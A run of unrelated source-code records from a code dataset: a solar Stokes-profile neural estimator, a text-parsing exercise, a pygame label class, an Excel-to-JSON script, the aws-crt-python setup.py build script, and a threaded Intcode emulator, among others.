myestimator.prediction(name='network1',dataprediction,logtau,original_logtau,\"model_output.nc\")\n \n \"\"\"\n\n print('[INFO] Sending the data to the network')\n o = sp.profile(inputdata)\n idx = np.where(o.weights[:, 0] < 1.0)[0]\n stokelist = np.array([np.concatenate([o.dat[0, :, :, idx, 0], 1e0 * o.dat[0, :, :, idx, 1],\n 1e0 * o.dat[0, :, :, idx, 2],\n 1e0 * o.dat[0, :, :, idx, 3]])])\n print(stokelist.shape,'...')\n self.nl = stokelist.shape[1]\n self.deepl = deep_network(name, logtau, self.nl)\n prediction = self.deepl.read_and_predict(stokelist)\n nx, ny, dum = prediction[0, :, :, :].shape\n prediction = np.reshape(prediction[0, :, :, :], (nx, ny, 6, len(logtau)))\n noriginaltau = len(original_logtau)\n\n # Fill the model with the prediction\n print('[INFO] Writing in STiC format')\n m = sp.model(nx=nx, ny=ny, nt=1, ndep=noriginaltau)\n from tqdm import tqdm\n for ix in tqdm(range(nx)):\n for iy in range(ny):\n temp = np.interp(original_logtau, logtau, np.abs(prediction[ix, iy, 0, :]))\n vlos = np.interp(original_logtau, logtau, prediction[ix, iy, 1, :])\n vturb = np.interp(original_logtau, logtau, np.abs(prediction[ix, iy, 2, :]))\n Bln = np.interp(original_logtau, logtau, prediction[ix, iy, 3, :])\n Bho = np.interp(original_logtau, logtau, np.abs(prediction[ix, iy, 4, :]))\n Bazi = np.interp(original_logtau, logtau, prediction[ix, iy, 5, :])\n\n m.ltau[0, iy, ix, :] = original_logtau\n m.temp[0, iy, ix, :] = temp * 1e3\n m.vlos[0, iy, ix, :] = vlos * 1e5\n m.pgas[0, iy, ix, :] = pgastop\n m.vturb[0, iy, ix, :] = vturb * 1e5\n m.Bln[0, iy, ix, :] = Bln * 1e3\n m.Bho[0, iy, ix, :] = Bho * 1e3\n m.azi[0, iy, ix, :] = Bazi\n\n # Write the model\n m.write(nameoutput)\n\n def create_dataset(self, model_train_list, stokes_train_list, logtau_train_list):\n \"\"\"Creates a dataset for training\n\n Parameters\n ----------\n model_train_list : list of 
strings\n List of models in STiC format used for training\n stokes_train_list : list of strings\n List of observed or synthetic profiles for training\n logtau_train_list : list\n List of logtau values included in the training\n\n \"\"\"\n self.logtau = np.array(logtau_train_list)\n\n stokelist, cubelist = [], []\n for simu in range(len(model_train_list)):\n m = sp.model(model_train_list[simu])\n s = sp.profile(stokes_train_list[simu])\n idx = np.where(s.weights[:, 0] < 1.0)[0]\n indices = sorted(gentools.findindex(self.logtau, m.ltau[0, 0, 0, :]))\n ni = len(indices)\n\n # Physical parameters\n supercube = np.zeros((ni * self.num_params, m.temp.shape[1], m.temp.shape[2]))\n supercube[:ni] = m.temp[0, :, :, indices] / 1e3\n supercube[ni:2 * ni] = m.vlos[0, :, :, indices] / 1e5\n supercube[ni * 2:3 * ni] = m.vturb[0, :, :, indices] / 1e5\n supercube[ni * 3:4 * ni] = m.Bln[0, :, :, indices] / 1e3\n supercube[ni * 4:5 * ni] = m.Bho[0, :, :, indices] / 1e3\n supercube[ni * 5:6 * ni] = m.azi[0, :, :, indices]\n\n # Stokes parameters\n stokes = np.concatenate([s.dat[0, :, :, idx, 0], 1e0 * s.dat[0, :, :, idx, 1],\n 1e0 * s.dat[0, :, :, idx, 2], 1e0 * s.dat[0, :, :, idx, 3]])\n\n stokelist.append(stokes)\n cubelist.append(supercube)\n\n self.cubelist = cubelist\n self.stokelist = stokelist\n self.nl = len(stokes)\n\n \n def prepare_training(self, name='network1', option='start', nepochs=20, extranoise=5e-4,\n learning_rate=1e-4, batch_size=100, datasize=10, samplesize=20):\n \"\"\"It defines the network and start the training.\n\n Parameters\n ----------\n name : str, optional\n name of the network, by default 'network1'\n option : str, optional\n start or continue the previous training, by default 'start'\n nepochs : int, optional\n Number of epochs, by default 20\n extranoise : [type], optional\n Extra noise level in Stokes profiles, by default 5e-4\n learning_rate : [type], optional\n Learning rate used in Adam optimizer, by default 1e-4\n batch_size : int, optional\n Size of each batch, by default 100\n datasize : int, optional\n Size of the dataset created for training, by default 10\n samplesize : int, optional\n Size of each FOV created for training, by default 20\n \n \n \"\"\"\n\n self.name = name\n self.option = option # [start] or [continue]\n self.nepochs = nepochs\n self.extranoise = extranoise\n self.learning_rate = learning_rate\n self.batch_size = batch_size\n self.samplesize = samplesize\n self.datasize = datasize*batch_size\n\n if self.logtau is None: print('Variable logtau scale should be define')\n if self.cubelist is None: print('Data to train should be given')\n if self.stokelist is None: print('Data to train should be given')\n\n self.deepl = deep_network(self.name, self.logtau, self.nl)\n\n if self.option == 'start':\n self.deepl.define_network()\n self.deepl.train(self.nepochs, self.stokelist, self.cubelist, self.extranoise,\n self.learning_rate, self.batch_size, self.datasize)\n\n elif self.option == 'continue':\n self.deepl.read_network()\n self.deepl.train(self.nepochs, self.stokelist, self.cubelist, self.extranoise,\n self.learning_rate, self.batch_size, self.datasize)\n\n else:\n print('Keyword \"option\" should be \"start\" or \"continue\"')\n\n\n def train(self, name='network1', option='start', nepochs=20, model_train_list=None, stokes_train_list=None,\n logtau_train_list=None, extranoise=6e-4, learning_rate=1e-4, batch_size=100, datasize=100, samplesize=20):\n \"\"\"Train the neural network\n\n Parameters\n ----------\n name : str, optional\n name of the network, 
by default 'network1'\n option : str, optional\n start or continue the previous training, by default 'start'\n nepochs : int, optional\n Number of epochs, by default 20\n model_train_list : list of strings\n List of models in STiC format used for training\n stokes_train_list : list of strings\n List of observed or synthetic profiles for training\n logtau_train_list : list\n List of logtau values included in the training\n extranoise : [type], optional\n Extra noise level in Stokes profiles, by default 5e-4\n learning_rate : [type], optional\n Learning rate used in Adam optimizer, by default 1e-4\n batch_size : int, optional\n Size of each batch, by default 100\n datasize : int, optional\n Size of the dataset created for training, by default 10\n samplesize : int, optional\n Size of each FOV created for training, by default 20\n \n Example\n -------\n # Reading data in STiC format:\n >>> model_train_list = ['model.nc']\n >>> stokes_train_list = ['profiles.nc']\n >>> logtau = [-7,-6,-5,-4,-3,-2,-1, 0, 1]\n\n # Initializing the neural network\n >>> myestimator = nst.neural_estimator()\n >>> myestimator.train(name='network1',option='start',nepochs=10,model_train_list,stokes_train_list,logtau)\n >>> myestimator.quickplot()\n\n \"\"\"\n\n\n self.create_dataset(model_train_list, stokes_train_list, logtau_train_list)\n self.prepare_training(name, option, nepochs, extranoise, learning_rate, batch_size, datasize, samplesize)\n\n\n\n def quickplot(self,indexlist=[3,7],filename ='testplot.pdf'):\n \"\"\"Quick figure with the comparison between the training dataset and\n the prediction of the network.\n\n Parameters\n ----------\n indexlist : list, optional\n List of logtau to plot, by default [3,7]\n \"\"\"\n print('[INFO] Running quick plot')\n import matplotlib.pyplot as plt\n from ISPy.util.plottools import phimap, add_colorbar\n\n stokelist = np.array(self.stokelist)[0:1,:]\n prediction = self.deepl.read_and_predict(stokelist)\n nx, ny, dum = prediction[0, :, :, :].shape\n\n # Prediction\n prediction = np.reshape(prediction[0, :, :, :], (nx, ny, 6, len(self.logtau)))\n cubelist = np.array(self.cubelist).T[:,:,:,0]\n cubelist = np.reshape(cubelist, (nx,ny,6,9))\n newtau = self.logtau[:]\n\n\n listnvari = [0,2,1,3,4,5]\n cmapvari = ['magma', 'viridis', 'seismic', 'RdGy', 'PRGn', phimap]\n phylabel = ['Temp', r'$v_{turb}$',r'$v_{los}$',r'$B_{long}$',r'$B_{perp}$',r'Azi']\n limitsmax = [8.,7.,+5,+5,+10,+10,+1,+1,+1,+1,np.pi,np.pi]\n limitsmin = [4.5,5,-0,-0,-10,-10,-1,-1,-1,-1,0,0]\n normalizecte = [1.0,1.0,1.0,1.0,1.0,np.pi/180.]\n\n fig, axs = plt.subplots(figsize=(9,10), nrows=len(listnvari), ncols=4, sharex=True, sharey=True)\n for ii in range(len(listnvari)):\n ii2 = int(ii*2)\n ii21 = ii2 + 1\n\n indiplot = indexlist[0]\n axs[ii,0].set_title(r'NN - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n axs[ii,0].imshow(prediction[:,:,listnvari[ii],indiplot].T*normalizecte[ii],cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii2],vmax=limitsmax[ii2])\n axs[ii,1].set_title(r'STiC - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n im = axs[ii,1].imshow(cubelist[:,:,listnvari[ii],indiplot].T,cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii2],vmax=limitsmax[ii2])\n cb = add_colorbar(im, aspect=30)\n\n indiplot = indexlist[1]\n axs[ii,2].set_title(r'NN - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n axs[ii,2].imshow(prediction[:,:,listnvari[ii],indiplot].T*normalizecte[ii],cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii21],vmax=limitsmax[ii21])\n 
axs[ii,3].set_title(r'STiC - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n im = axs[ii,3].imshow(cubelist[:,:,listnvari[ii],indiplot].T,cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii21],vmax=limitsmax[ii21])\n cb = add_colorbar(im, aspect=30)\n\n plt.tight_layout()\n plt.savefig(filename, bbox_inches='tight')\n","sub_path":"ISPy/util/neural_estimation.py","file_name":"neural_estimation.py","file_ext":"py","file_size_in_byte":24065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"441473767","text":"from io import TextIOWrapper\nimport os\nimport sys\nfrom collections import Counter\nimport re\n\n\nclass Parser(object):\n def __init__(self,in_dir:str,out_dir:str) -> None:\n self.__input_dir = in_dir\n self.__output_dir = out_dir\n self.__f = TextIOWrapper\n self.__countTo = int()\n self.__countIng = int()\n self.__list = list()\n self.__unique_list = list()\n self.__dict = dict()\n\n self.__list_of_words_in_a_file()\n \n self.__counter = Counter(self.__list)\n \n def __list_of_words_in_a_file(self):\n with open(self.__input_dir,\"r\") as self.__f:\n for i in self.__f.read().lower().replace('\\n','; ').split(' '):\n self.__list.append(str(i))\n \n def find_TO(self):\n try:\n assert len(self.__list) > 1\n for i in self.__list:\n if i.startswith(\"to\"):\n self.__countTo += 1\n print(f\"The number of words having prefix with \\\"To\\\" in the input file = {self.__countTo}\")\n except AssertionError:\n print('Passed an empty file')\n \n def find_ING(self):\n try:\n assert len(self.__list) > 1\n for i in self.__list:\n if i.endswith(\"ing\"):\n self.__countIng +=1\n print(f\"The number of words ending with \\\"ing\\\" in the input file = {self.__countIng}\")\n except AssertionError:\n print(\"Passed an empty file\")\n \n def find_max_words(self):\n try:\n assert self.__counter.most_common(1)[0][1] > 1\n print(f\"The word that was repeated maximum number of times is {self.__counter.most_common(1)[0][0]}\")\n except AssertionError:\n print(\"All words are repeated exactly once, So maximum cannot be found\")\n \n def palindrome(self):\n try:\n assert len(self.__list) > 1 \n flag = 0\n print(\"The palindrome present in the files are: \",end=' ')\n for i in self.__list:\n if i == i[::-1]:\n print(i)\n else:\n flag += 1\n if flag == len(self.__list):\n print(\"Null\")\n except AssertionError:\n print(\"Passed an empty file\")\n\n def find_unique_list(self):\n self.__unique_list = [i for i in self.__list if self.__list.count(i) == 1]\n try:\n assert len(self.__unique_list) > 0\n print(f\"Unique elements in a list are: {self.__unique_list}\",) \n except AssertionError:\n print(\"No unique elements in the file\")\n \n def word_dict(self):\n self.__dict = {self.__list[i]:self.__list.index(i) for i in self.__list }\n print(f\"word dict {self.__dict}\")\n\n def __write_output(self,open_type,r):\n try:\n with open(self.__output_dir,r) as self.__f:\n if open_type == \"vowels\":\n for i in self.__list:\n self.__f.write(\" \".join(re.split('a|e|i|o|u',i))+\",\")\n if open_type == \"capitalize3\":\n self.__f.write('\\n')\n for i in self.__list:\n if i != ';':\n temp = i[2].upper()\n self.__f.write(i[:2]+temp+i[3:]+\" \")\n if open_type == \"capitalize5\":\n self.__f.write('\\n')\n for i,j in enumerate(self.__list):\n if j != ';' and i == 5:\n self.__f.write(j.upper()+\" \")\n elif i != 5 and j != ';':\n self.__f.write(j+\" \")\n if open_type == \"-space\":\n self.__f.write('\\n')\n for j,i in enumerate(self.__list):\n if i != ';' and j 
!= len(self.__list)-1:\n self.__f.write(i+'-')\n elif j == len(self.__list)-1:\n self.__f.write(i)\n if open_type == \"semicolon\": \n self.__f.write('\\n')\n for i in self.__list:\n self.__f.write(i)\n \n except FileNotFoundError as e:\n print(\"Exception: \",e)\n \n def splitvowels(self):\n return self.__write_output(\"vowels\",\"w+\")\n def capatilize_3_letter(self):\n return self.__write_output(\"capitalize3\",\"a+\")\n def capatilize_5_Word(self):\n return self.__write_output(\"capitalize5\",\"a+\")\n def change_blankspace(self):\n return self.__write_output(\"-space\",\"a+\")\n def split_using_semicolon(self):\n return self.__write_output(\"semicolon\",\"a+\")\n \n \n \nif __name__ == \"__main__\":\n try:\n in_dir = os.path.join(os.getcwd(),sys.argv[1])\n except FileNotFoundError as e:\n print(\"Exception: \",e)\n\n out_dir = os.path.join(os.getcwd(),sys.argv[2])\n\n p = Parser(in_dir,out_dir)\n assert isinstance(p,Parser),\"object not valid\"\n p.find_TO()\n p.find_ING()\n p.find_max_words()\n p.palindrome()\n p.find_unique_list()\n p.word_dict()\n p.splitvowels()\n p.capatilize_3_letter()\n p.capatilize_5_Word()\n p.change_blankspace()\n p.split_using_semicolon()","sub_path":"Exercise-2021-06-21/Exercise-1.py","file_name":"Exercise-1.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"99623560","text":"import pygame\nfrom Utils.gui.FontProvider import FontProvider\nimport Utils.gui.FontProperties as Gui\n\nclass TextLabelSurface(pygame.Surface):\n def __init__(self, text, fontProperties):\n assert isinstance(fontProperties, Gui.FontProperties), \"Expected fontPropertys to by of type FontProperties.\"\n self.text = text\n self._fontProperties = fontProperties\n self.image = None \n \n def render(self, width=None):\n font = FontProvider.getFontByFileName(self._fontProperties)\n fontImage = font.render(self.text, True, self._fontProperties.Color, self._fontProperties.Background)\n if not width:\n return fontImage\n else:\n rect = fontImage.get_rect()\n self.image = pygame.Surface((width, rect.height))\n \n if self._fontProperties.Background:\n self.image.fill(self._fontProperties.Background)\n else:\n self.image.fill((1,2,3))\n self.image.set_colorkey((1,2,3))\n center = width // 2 - rect.width // 2\n self.image.blit(fontImage, (center, 0))\n return self.image\n\n\n","sub_path":"SimpleGame/SimpleGame/Src/Utils/gui/TextLabelSurface.py","file_name":"TextLabelSurface.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"650196140","text":"import xlrd\nimport json\nfrom collections import OrderedDict\nimport argparse\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--excel_path', required=True)\n parser.add_argument('--foldername', required=True)\n config = parser.parse_args()\n\n _excel = xlrd.open_workbook(config.excel_path, on_demand=False, encoding_override='cp949')\n sheet = _excel.sheet_by_name(\"Sheet1\")\n\n _json = OrderedDict()\n\n row_count = sheet.nrows\n for index in range(0, row_count):\n value = sheet.row_values(index)[0]\n string_index = str(index).zfill(4)\n key = \"./datasets/\" + config.foldername + \"/audio/Raw.\" + string_index + \".wav\"\n _json[key] = value\n\n with open(\"./datasets/\" + config.foldername + '/recognition.json', 'w') as f:\n json.dump(_json, f, indent=2, ensure_ascii=False)\n\n _excel.release_resources()\n del 
_excel","sub_path":"recognition/excel_to_json.py","file_name":"excel_to_json.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"68118115","text":"import setuptools\nimport os\nimport subprocess\nfrom subprocess import CalledProcessError\nimport platform\nfrom os import path\nimport sys\n\ndef is_64bit():\n if sys.maxsize > 2**32:\n return True\n\n return False\n\ndef is_32bit():\n return is_64bit() == False\n\ndef is_arm ():\n return platform.machine().startswith('arm')\n\ndef determine_cross_compile_string():\n host_arch = platform.machine()\n if (host_arch == 'AMD64' or host_arch == 'x86_64') and is_32bit() and sys.platform != 'win32':\n return '-DCMAKE_C_FLAGS=-m32'\n return ''\n\ndef determine_generator_string():\n if sys.platform == 'win32':\n vs_version = None\n prog_x86_path = os.getenv('PROGRAMFILES(x86)')\n if vs_version == None:\n if os.path.exists(prog_x86_path + '\\\\Microsoft Visual Studio\\\\2019'):\n vs_version = '16.0'\n print('found installed version of Visual Studio 2019')\n elif os.path.exists(prog_x86_path + '\\\\Microsoft Visual Studio\\\\2017'):\n vs_version = '15.0'\n print('found installed version of Visual Studio 2017')\n elif os.path.exists(prog_x86_path + '\\\\Microsoft Visual Studio 14.0'):\n vs_version = '14.0'\n print('found installed version of Visual Studio 2015')\n else:\n print('Making an attempt at calling vswhere')\n vswhere_args = ['%ProgramFiles(x86)%\\\\Microsoft Visual Studio\\\\Installer\\\\vswhere.exe', '-legacy', '-latest', '-property', 'installationVersion']\n vswhere_output = None\n\n try:\n vswhere_output = subprocess.check_output(vswhere_args, shell=True)\n except CalledProcessError as ex:\n print('No version of MSVC compiler could be found!')\n exit(1)\n\n if vswhere_output != None:\n for out in vswhere_output.split():\n vs_version = out.decode('utf-8')\n else:\n print('No MSVC compiler could be found!')\n exit(1)\n\n vs_major_version = vs_version.split('.')[0]\n\n cmake_list_gen_args = ['cmake', '--help']\n cmake_help_output = subprocess.check_output(cmake_list_gen_args)\n\n vs_version_gen_str = None\n for out in cmake_help_output.splitlines():\n trimmed_out = out.decode('utf-8').strip()\n if 'Visual Studio' in trimmed_out and vs_major_version in trimmed_out:\n print('selecting generator {}'.format(trimmed_out))\n vs_version_gen_str = trimmed_out.split('[')[0].strip()\n break\n\n if vs_version_gen_str == None:\n print('CMake does not recognize an installed version of visual studio on your system.')\n exit(1)\n\n if is_64bit():\n print('64bit version of python detected, using win64 builds')\n vs_version_gen_str = vs_version_gen_str + ' Win64'\n\n vs_version_gen_str = '-G' + vs_version_gen_str\n print('Succesfully determined generator as \\\"{}\\\"'.format(vs_version_gen_str))\n return vs_version_gen_str\n return ''\n\ngenerator_string = determine_generator_string()\ncross_compile_string = determine_cross_compile_string()\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\nshell = sys.platform.startswith('win')\n\nbuild_dir = os.path.join(current_dir, 'deps_build')\nif not os.path.exists(build_dir):\n os.mkdir(build_dir)\nos.chdir(build_dir)\n\nlib_dir = 'lib'\ndep_install_path = os.path.join(build_dir, 'install')\nif 'AWS_C_INSTALL' in os.environ:\n dep_install_path = os.getenv('AWS_C_INSTALL')\n if os.path.exists(os.path.join(dep_install_path, 'lib64')):\n lib_dir = 'lib64'\n\ndef build_dependency(lib_name):\n lib_source_dir = 
os.path.join(current_dir, lib_name)\n global lib_dir\n # Skip library if it wasn't pulled\n if not os.path.exists(os.path.join(lib_source_dir, 'CMakeLists.txt')):\n lib_dir = 'lib'\n return\n\n lib_build_dir = os.path.join(build_dir, lib_name)\n if not os.path.exists(lib_build_dir):\n os.mkdir(lib_build_dir)\n os.chdir(lib_build_dir)\n\n cmake_args = [\n 'cmake',\n generator_string,\n cross_compile_string,\n '-DCMAKE_PREFIX_PATH={}'.format(dep_install_path),\n '-DCMAKE_INSTALL_PREFIX={}'.format(dep_install_path),\n '-DBUILD_SHARED_LIBS=OFF',\n '-DCMAKE_INSTALL_LIBDIR={}'.format(lib_dir),\n '-DCMAKE_BUILD_TYPE=Release',\n '-DUSE_S2N_PQ_CRYPTO=OFF',\n '-DBUILD_TESTING=OFF',\n ]\n cmake_args.append(lib_source_dir)\n build_cmd = ['cmake', '--build', './', '--config', 'release', '--target', 'install']\n\n ret_code = subprocess.check_call(cmake_args, stderr=subprocess.STDOUT, shell=shell)\n ret_code = subprocess.check_call(build_cmd, stderr=subprocess.STDOUT, shell=shell)\n\n os.chdir(build_dir)\n return ret_code\n\nif sys.platform != 'darwin' and sys.platform != 'win32':\n build_dependency('s2n')\nbuild_dependency('aws-c-common')\nbuild_dependency('aws-c-io')\nbuild_dependency('aws-c-mqtt')\nbuild_dependency('aws-c-cal')\nbuild_dependency('aws-c-compression')\nbuild_dependency('aws-c-http')\n\nos.chdir(current_dir)\n\nfrom distutils.ccompiler import get_default_compiler\ncompiler_type = get_default_compiler()\n\naws_c_libs = ['aws-c-mqtt', 'aws-c-http', 'aws-c-io', 'aws-c-compression', 'aws-c-cal', 'aws-c-common']\n\ndef get_from_env(key):\n try:\n return os.environ[key]\n except:\n return \"\"\n\n# fetch the CFLAGS/LDFLAGS from env\ncflags = get_from_env('CFLAGS').split()\nldflags = get_from_env('LDFLAGS').split()\n\ninclude_dirs = [path.join(dep_install_path, 'include')]\nlibraries = list(aws_c_libs)\nlibrary_dirs = [path.join(dep_install_path, lib_dir)]\nextra_objects = []\n\nif compiler_type == 'msvc':\n #if this is old python, we need to statically link in the VS2015 CRT, the invoking script\n # already overrode the compiler environment variables so that a decent compiler is used\n # and this is C so it shouldn't really matter.\n # actually, I couldn't get this to work, leave it here commented out for future brave souls\n #if sys.version_info[0] == 2 or (sys.version_info[0] == 3 and sys.version_info[1] <= 4):\n # cflags += ['/MT']\n pass\nelse:\n cflags += ['-O3', '-Wextra', '-Werror', '-std=gnu99']\n\nif sys.platform == 'win32':\n #the windows apis being used under the hood. 
Since we're static linking we have to follow the entire chain down\n libraries += ['Secur32', 'Crypt32', 'Advapi32', 'BCrypt', 'Kernel32', 'Ws2_32']\nelif sys.platform == 'darwin':\n ldflags += ['-framework Security']\n include_dirs = ['/usr/local/include'] + include_dirs\n library_dirs = ['/usr/local/' + lib_dir] + library_dirs\n extra_objects = ['{}/{}/lib{}.a'.format(dep_install_path, lib_dir, lib) for lib in aws_c_libs]\nelse:\n include_dirs = ['/usr/local/include'] + include_dirs\n library_dirs = ['/usr/local/' + lib_dir] + library_dirs\n libraries += ['s2n', 'crypto', 'rt']\n aws_c_libs += ['s2n']\n\n# ensure that the child linker process gets our flags\nos.environ['LDFLAGS'] = ' '.join(ldflags)\n\n_aws_crt_python = setuptools.Extension(\n '_aws_crt_python',\n language='c',\n define_macros=[\n ('MAJOR_VERSION', '1'),\n ('MINOR_VERSION', '0'),\n ],\n include_dirs=['/usr/local/include', dep_install_path + '/include'],\n library_dirs=['/usr/local/' + lib_dir, dep_install_path + '/' + lib_dir],\n libraries=libraries,\n sources=[\n 'source/module.c',\n 'source/io.c',\n 'source/mqtt_client.c',\n 'source/mqtt_client_connection.c',\n 'source/http_client_connection.c',\n 'source/crypto.c',\n ],\n extra_objects=extra_objects,\n extra_compile_args=cflags,\n)\n\nsetuptools.setup(\n name=\"awscrt\",\n version=\"v0.2.22\",\n author=\"Amazon Web Services, Inc\",\n author_email=\"aws-sdk-common-runtime@amazon.com\",\n description=\"A common runtime for AWS Python projects\",\n url=\"https://github.com/awslabs/aws-crt-python\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=[\n 'enum34 ; python_version<\"3.4\"',\n 'futures ; python_version<\"3.2\"',\n ],\n ext_modules = [_aws_crt_python],\n)\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"394655075","text":"from sys import stdin\ninput = stdin.readline\n\nN = int(input())\n\ndp = [0 for _ in range(91)]\ndp[1] = 1\ndp[2] = 1\ndp[3] = 2\n\nfor i in range(4, 91):\n dp[i] = dp[i-1] + dp[i-2]\n\nprint(dp[N])","sub_path":"pythAlgo/baekjoon/pinary_number2.py","file_name":"pinary_number2.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"648925461","text":"################################################################################\r\n# INTCODE_T.py\r\n# 2019-12-11\r\n# Mike Quigley\r\n#\r\n# This variant of the Intcode emulator runs in a threat and uses queues for I/O\r\n# It's a separate file because threads can't be started again after they stop,\r\n# so this version can't run in interactive mode like the other one.\r\n#\r\n# Will send program outputs (opcode 4) to outQ,\r\n# as well as \"END\" when the program ends\r\n#\r\n# 2019-12-13: Optional prompt for input. Will put \"P>\" on outQ\r\n# 2019-12-19: Added load function that takes a list of ints. 
Should be faster\r\n# than reading from file\r\n#\r\n# Opcode table:\r\n# 1: ADD A B DEST - Adds A + B, result in DEST.\r\n# 2: MUL A B DEST - Multiplies A * B, result in DEST\r\n# 3: INP DEST - Reads input to DEST\r\n# 4: OUT A - put A on output queue\r\n# 5: JNZ A B - If A is not 0, set program counter to B\r\n# 6: JEZ A B - If A is 0, set program counter to B\r\n# 7: TLT A B DEST - If A < B, store 1 in DEST. Otherwise store 0\r\n# 8: TEQ A B DEST - If A == B, store 1 in DEST. Otherwise store 0\r\n# 9: ARB A - Add A to relative base\r\n# 99: HALT\r\n################################################################################\r\nimport threading\r\nimport queue\r\n\r\nclass Intcomp_T(threading.Thread):\r\n\r\n #mem is RAM size\r\n def __init__(self, threadID, name, mem, prompt_for_input = False):\r\n threading.Thread.__init__(self)\r\n self.threadID = threadID\r\n self.name = name\r\n self.prompt_for_input = prompt_for_input\r\n self.inQ = queue.Queue() #Input queue\r\n self.outQ = queue.Queue() #Output queue\r\n self.ram = [] #Main memory\r\n self.pM = [0, 0, 0] #Parameter mode flags\r\n self.pc = 0 #Program counter\r\n self.base = 0 #Relative Base\r\n self.ram = [0 for i in range(mem)]\r\n\r\n #Load program from list of int\r\n def load(self, program):\r\n for i in range(len(program)):\r\n self.ram[i] = program[i]\r\n\r\n #Load program from file\r\n def loadfile(self, filename):\r\n file = open(filename,'r')\r\n prog = file.readline().split(',')\r\n for i in range(len(prog)):\r\n self.ram[i] = int(prog[i])\r\n file.close()\r\n\r\n #Fetch value from RAM. Behaviour governed by mode flag\r\n def fetch(self, param):\r\n if self.pM[param - 1] == 0:\r\n return self.ram[self.ram[self.pc + param]]\r\n elif self.pM[param - 1] == 1:\r\n return self.ram[self.pc + param]\r\n elif self.pM[param - 1] == 2:\r\n return self.ram[self.ram[self.pc + param] + self.base]\r\n\r\n #Writes value to RAM. 
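# Decoding sketch for the parameter-mode scheme used by run() below (the
# instruction value 1002 is just an example): op = 1002 % 100 -> 2 (MUL),
# and the mode flags come from the higher digits,
#   pM = [(1002 // 10**k) % 10 for k in (2, 3, 4)]   # -> [0, 1, 0]
# i.e. parameter 1 is positional, parameter 2 is immediate, and parameter 3
# (the destination) is positional.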
Behaviour governed by mode flag\r\n def write(self, param, value):\r\n if self.pM[param - 1] == 0:\r\n self.ram[self.ram[self.pc+param]] = value\r\n elif self.pM[param - 1] == 2:\r\n self.ram[self.ram[self.pc+param] + self.base] = value\r\n\r\n #Run program\r\n def run(self):\r\n halt = False\r\n self.pc = 0\r\n op = 0\r\n while not halt:\r\n op = self.ram[self.pc] % 100\r\n self.pM[0] = (self.ram[self.pc] // 100) % 10\r\n self.pM[1] = (self.ram[self.pc] // 1000) % 10\r\n self.pM[2] = (self.ram[self.pc] // 10000) % 10\r\n if op == 1:\r\n self.write(3, self.fetch(1) + self.fetch(2))\r\n self.pc += 4\r\n elif op == 2:\r\n self.write(3, self.fetch(1) * self.fetch(2))\r\n self.pc += 4\r\n elif op == 3:\r\n if self.prompt_for_input:\r\n self.outQ.put('P>')\r\n self.write(1, self.inQ.get(True))\r\n self.pc += 2\r\n elif op == 4:\r\n self.outQ.put(self.fetch(1))\r\n self.pc += 2\r\n elif op == 5:\r\n self.pc = self.fetch(2) if self.fetch(1) != 0 else self.pc + 3\r\n elif op == 6:\r\n self.pc = self.fetch(2) if self.fetch(1) == 0 else self.pc + 3\r\n elif op == 7:\r\n self.write(3, 1 if self.fetch(1) < self.fetch(2) else 0)\r\n self.pc += 4\r\n elif op == 8:\r\n self.write(3, 1 if self.fetch(1) == self.fetch(2) else 0)\r\n self.pc += 4\r\n elif op == 9:\r\n self.base += self.fetch(1)\r\n self.pc += 2\r\n elif op == 99:\r\n self.outQ.put(\"END\")\r\n halt = True\r\n else:\r\n print(\"ERROR UNKNOWN OPCODE\", op, \"AT ADDR\", self.pc)\r\n self.outQ.put(\"END\")\r\n halt = True\r\n","sub_path":"INTCODE_T.py","file_name":"INTCODE_T.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"73218221","text":"##example code : https://colab.research.google.com/drive/17yT2RUKvNENVYZu9hq-q0s-hK7wZX6WA?usp=sharing\n#no context manager is used so we will need to close manually\n\nimport tempfile\nf=tempfile.NamedTemporaryFile(\"w+b\", prefix =\"StevesnamePrefix\",suffix=\".txt\")\nf.write(\"this could be a json in string format\".encode())\n#this next bits seeks the start of the text to read.\nf.seek(0)\n#read the context\nprint(f.read())\n\nfilename = f.name\nprint(filename)\nf.close()\n","sub_path":"tempfile_example.py","file_name":"tempfile_example.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"361584017","text":"import glob\nimport json\nimport os\nimport random\nfrom collections import defaultdict\n\nimport numpy as np\nimport torch\nimport torch.utils.data\nfrom PIL import Image\n\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\nfrom maskrcnn_benchmark.structures.segmentation_mask import Heatmap\nfrom maskrcnn_benchmark.utils.density import generate_density_map, rpc_category_to_super_category\n\nDENSITY_MAP_WIDTH = 100\nDENSITY_MAP_HEIGHT = 100\n\n\n# --------------------------------------------\n# ----------------Test dataset----------------\n# --------------------------------------------\nclass 